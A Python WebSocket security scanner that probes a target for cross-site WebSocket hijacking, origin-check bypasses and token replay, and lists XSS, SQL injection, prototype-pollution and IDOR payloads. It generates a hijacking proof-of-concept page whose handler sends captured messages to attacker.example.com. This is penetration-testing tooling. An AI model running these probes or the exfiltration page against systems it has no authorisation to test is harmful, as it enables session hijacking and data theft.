#!/usr/bin/env python3
"""
websocket_scanner.py — WebSocket security scanner.

Tests for CSWSH (Cross-Site WebSocket Hijacking), origin validation bypass,
auth token replay, message injection, and IDOR via sequential message IDs.

Usage:
  python3 tools/websocket_scanner.py --url ws://app.example.com/ws
  python3 tools/websocket_scanner.py --url wss://app.example.com/ws --origin https://app.example.com
  python3 tools/websocket_scanner.py --url wss://app.example.com/ws --dry-run
  python3 tools/websocket_scanner.py --url wss://app.example.com/ws --token eyJ... --json
"""

import argparse
import base64
import hashlib
import json
import os
import time
import urllib.request
import urllib.error
import urllib.parse

# ─── Color codes ──────────────────────────────────────────────────────────────
RED    = "\033[91m"
YELLOW = "\033[93m"
GREEN  = "\033[92m"
CYAN   = "\033[96m"
BLUE   = "\033[94m"
BOLD   = "\033[1m"
DIM    = "\033[2m"
RESET  = "\033[0m"

FINDINGS = []

# WebSocket GUID per RFC 6455
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


# ─── WebSocket helpers ────────────────────────────────────────────────────────

def ws_upgrade_key() -> str:
    raw = os.urandom(16)
    return base64.b64encode(raw).decode()


def compute_accept(key: str) -> str:
    combined = (key + WS_GUID).encode()
    # SHA-1 is mandated by the WebSocket protocol spec (RFC 6455 §4.2.2).
    # This is not used for security; usedforsecurity=False suppresses the warning.
    return base64.b64encode(hashlib.sha1(combined, usedforsecurity=False).digest()).decode()  # nosec B324


def ws_to_http_url(ws_url: str) -> str:
    if ws_url.startswith("wss://"):
        return "https://" + ws_url[6:]
    if ws_url.startswith("ws://"):
        return "http://" + ws_url[5:]
    return ws_url


def http_upgrade_probe(url: str, origin: str, token: str = "",
                        timeout: int = 10) -> tuple[int, dict]:
    """
    Send an HTTP Upgrade request and return (status_code, response_headers).
    Does NOT complete the WebSocket handshake — just checks server response.
    """
    http_url = ws_to_http_url(url)
    key = ws_upgrade_key()
    headers = {
        "Upgrade": "websocket",
        "Connection": "Upgrade",
        "Sec-WebSocket-Key": key,
        "Sec-WebSocket-Version": "13",
        "User-Agent": "Mozilla/5.0",
        "Origin": origin,
    }
    if token:
        headers["Authorization"] = f"Bearer {token}"
        headers["Cookie"] = f"token={token}"

    req = urllib.request.Request(http_url, headers=headers, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return r.status, dict(r.headers)
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers)
    except Exception as e:
        return 0, {"_error": str(e)}


def record(test: str, result: str, detail: str, severity: str = "HIGH"):
    FINDINGS.append({"test": test, "result": result, "detail": detail, "severity": severity})
    color = RED if result == "VULNERABLE" else (YELLOW if result == "INTERESTING" else GREEN)
    print(f"  {color}[{result}]{RESET} {test}")
    if detail:
        print(f"    {DIM}{detail}{RESET}")


def generate_cswsh_poc(ws_url: str, token: str = "") -> str:
    """Generate a self-contained CSWSH PoC HTML page."""
    token_line = ""
    if token:
        token_line = f"\n    // Note: token may also need to be sent — include as ?token={token[:20]}..."

    return f"""<!DOCTYPE html>
<html>
<!-- CSWSH PoC generated by websocket_scanner.py -->
<head><title>CSWSH PoC</title></head>
<body>
<h2>Cross-Site WebSocket Hijacking PoC</h2>
<pre id="log"></pre>
<script>
  function log(msg) {{
    document.getElementById("log").textContent += msg + "\\n";
  }}

  // Browser will automatically include cookies for the target domain
  var ws = new WebSocket("{ws_url}");{token_line}

  ws.onopen = function() {{
    log("[+] Connected to {ws_url}");
    // Send any messages the application normally sends
    ws.send(JSON.stringify({{type: "ping"}}));
    ws.send(JSON.stringify({{type: "get_user_data", id: 1}}));
  }};

  ws.onmessage = function(e) {{
    log("[DATA] " + e.data);
    // Exfiltrate to attacker server
    fetch("https://attacker.example.com/collect?data=" + encodeURIComponent(e.data));
  }};

  ws.onerror = function(e) {{
    log("[ERROR] " + e.type);
  }};

  ws.onclose = function(e) {{
    log("[CLOSED] code=" + e.code + " reason=" + e.reason);
  }};
</script>
</body>
</html>"""


# ─── Test Cases ───────────────────────────────────────────────────────────────

def test_origin_validation(url: str, legitimate_origin: str, token: str,
                            rate: float, dry_run: bool):
    print(f"\n{BOLD}[1] Origin Validation Bypass{RESET}")

    origins_to_test = [
        ("null-origin",           "null"),
        ("no-origin",             ""),
        ("attacker-origin",       "https://attacker.example.com"),
        ("subdomain-bypass",      f"https://evil.{urllib.parse.urlparse(ws_to_http_url(url)).hostname}"),
        ("case-variation",        legitimate_origin.upper() if legitimate_origin else "HTTPS://ATTACKER.COM"),
        ("dot-bypass",            f"https://{urllib.parse.urlparse(ws_to_http_url(url)).hostname}.evil.com"),
        ("unicode-variation",     "https://attacker.exаmple.com"),  # Cyrillic 'а'
        ("legit-origin",          legitimate_origin or "https://app.example.com"),
    ]

    for name, origin in origins_to_test:
        if dry_run:
            print(f"  {CYAN}[DRY-RUN]{RESET} Would probe with Origin: {origin!r}")
            continue
        time.sleep(1.0 / rate)
        status, hdrs = http_upgrade_probe(url, origin, token)
        accepted = status in (101, 200)
        if name != "legit-origin" and accepted:
            record(f"origin-bypass-{name}", "VULNERABLE",
                   f"Origin={origin!r} → HTTP {status} (upgrade accepted)")
            cswsh_poc = generate_cswsh_poc(url, token)
            print(f"\n  {RED}{BOLD}CSWSH PoC HTML:{RESET}")
            print(f"  {DIM}{'─'*50}{RESET}")
            for line in cswsh_poc.split("\n")[:20]:
                print(f"  {DIM}{line}{RESET}")
            print(f"  {DIM}... (save full PoC with --json){RESET}")
            FINDINGS[-1]["cswsh_poc"] = cswsh_poc
        elif name == "legit-origin":
            print(f"  {DIM}Baseline (legit origin): HTTP {status}{RESET}")
        else:
            record(f"origin-bypass-{name}", "BLOCKED", f"Origin={origin!r} → HTTP {status}")


def test_auth_token_replay(url: str, token: str, rate: float, dry_run: bool):
    print(f"\n{BOLD}[2] Auth Token Replay{RESET}")
    if not token:
        print(f"  {DIM}No --token provided — skipping auth tests{RESET}")
        return

    variations = [
        ("original-token",    token),
        ("empty-token",       ""),
        ("invalid-token",     "eyJhbGciOiJub25lIn0.e30."),
        ("reused-old-token",  token + "INVALID"),
    ]
    for name, t in variations:
        if dry_run:
            print(f"  {CYAN}[DRY-RUN]{RESET} Would probe with token variation: {name}")
            continue
        time.sleep(1.0 / rate)
        status, hdrs = http_upgrade_probe(url, "https://attacker.example.com", t)
        if name != "original-token" and status in (101, 200):
            record(f"auth-replay-{name}", "VULNERABLE",
                   f"Token={name} → HTTP {status} (accepted without valid auth)")
        else:
            record(f"auth-replay-{name}", "BLOCKED", f"HTTP {status}")


def test_message_injection(url: str, rate: float, dry_run: bool):
    """Show message injection payloads that would be sent post-connection."""
    print(f"\n{BOLD}[3] Message Injection Payloads (manual verification required){RESET}")
    payloads = [
        ("xss-payload",      '{"type":"message","content":"<img src=x onerror=alert(1)>"}'),
        ("idor-msg-id",      '{"type":"get_message","id":1}'),
        ("idor-user-id",     '{"type":"get_profile","user_id":1}'),
        ("proto-pollution",  '{"__proto__":{"isAdmin":true},"type":"ping"}'),
        ("sqli-payload",     '{"type":"search","query":"\' OR 1=1--"}'),
        ("null-byte",        '{"type":"ping","data":"test\\u0000payload"}'),
    ]
    for name, payload in payloads:
        print(f"  {DIM}{name:30s} {payload[:80]}{RESET}")
    if not dry_run:
        print(f"  {YELLOW}[INFO]{RESET} Connect to {url} and send above payloads manually")
        print(f"         or use Burp Suite WebSocket repeater")


def test_idor_sequential_ids(url: str, rate: float, dry_run: bool):
    """Show IDOR via sequential IDs attack surface."""
    print(f"\n{BOLD}[4] IDOR via Sequential Message IDs{RESET}")
    print(f"  {DIM}Attack: enumerate IDs 1..N to access other users' data{RESET}")
    templates = [
        '{"type":"get_conversation","id":{id}}',
        '{"type":"get_message","message_id":{id}}',
        '{"type":"get_order","order_id":{id}}',
        '{"action":"fetch","resourceId":"{id}"}',
    ]
    for t in templates:
        print(f"  {DIM}Template: {t}{RESET}")
        for i in range(1, 4):
            print(f"    {DIM}→ {t.replace('{id}', str(i))}{RESET}")
    if dry_run:
        print(f"  {CYAN}[DRY-RUN]{RESET} Above payloads would be sent over WebSocket")


# ─── Main ─────────────────────────────────────────────────────────────────────

def main():
    parser = argparse.ArgumentParser(description="WebSocket security scanner")
    parser.add_argument("--url",     required=True,
                        help="WebSocket URL (ws:// or wss://)")
    parser.add_argument("--origin",  default="",
                        help="Legitimate origin for baseline (e.g. https://app.example.com)")
    parser.add_argument("--token",   default="", help="Auth token (JWT or session)")
    parser.add_argument("--rate",    type=float, default=1.0, metavar="REQ/S",
                        help="Request rate limit in req/sec (default: 1.0)")
    parser.add_argument("--dry-run", action="store_true",
                        help="Show what would be tested without connecting")
    parser.add_argument("--json",    action="store_true", dest="json_output",
                        help="Output results as JSON (includes CSWSH PoC)")
    args = parser.parse_args()

    print(f"\n{BOLD}{BLUE}╔══════════════════════════════════════╗")
    print(f"║   WebSocket Security Scanner         ║")
    print(f"╚══════════════════════════════════════╝{RESET}")
    print(f"  Target   : {CYAN}{args.url}{RESET}")
    print(f"  Origin   : {args.origin or '(none)'}")
    print(f"  Rate     : {args.rate} req/sec")
    if args.dry_run:
        print(f"  Mode     : {YELLOW}DRY-RUN (no requests sent){RESET}")

    # Try to detect websockets library
    try:
        import websockets  # type: ignore
        print(f"  Library  : {GREEN}websockets available{RESET}")
    except ImportError:
        print(f"  Library  : {YELLOW}websockets not installed — using HTTP upgrade probe{RESET}")
        print(f"             Install with: pip install websockets")

    test_origin_validation(args.url, args.origin, args.token, args.rate, args.dry_run)
    test_auth_token_replay(args.url, args.token, args.rate, args.dry_run)
    test_message_injection(args.url, args.rate, args.dry_run)
    test_idor_sequential_ids(args.url, args.rate, args.dry_run)

    vulns = [f for f in FINDINGS if f["result"] == "VULNERABLE"]
    print(f"\n{BOLD}{'─'*50}{RESET}")
    print(f"  Tests run  : {len(FINDINGS)}")
    if vulns:
        print(f"  {RED}Vulnerable : {len(vulns)}{RESET}")
        for f in vulns:
            print(f"    {RED}→{RESET} {f['test']}: {f['detail']}")
    else:
        print(f"  {GREEN}Vulnerable : 0{RESET}")

    if args.json_output:
        print(json.dumps({"url": args.url, "findings": FINDINGS}, indent=2))


if __name__ == "__main__":
    main()
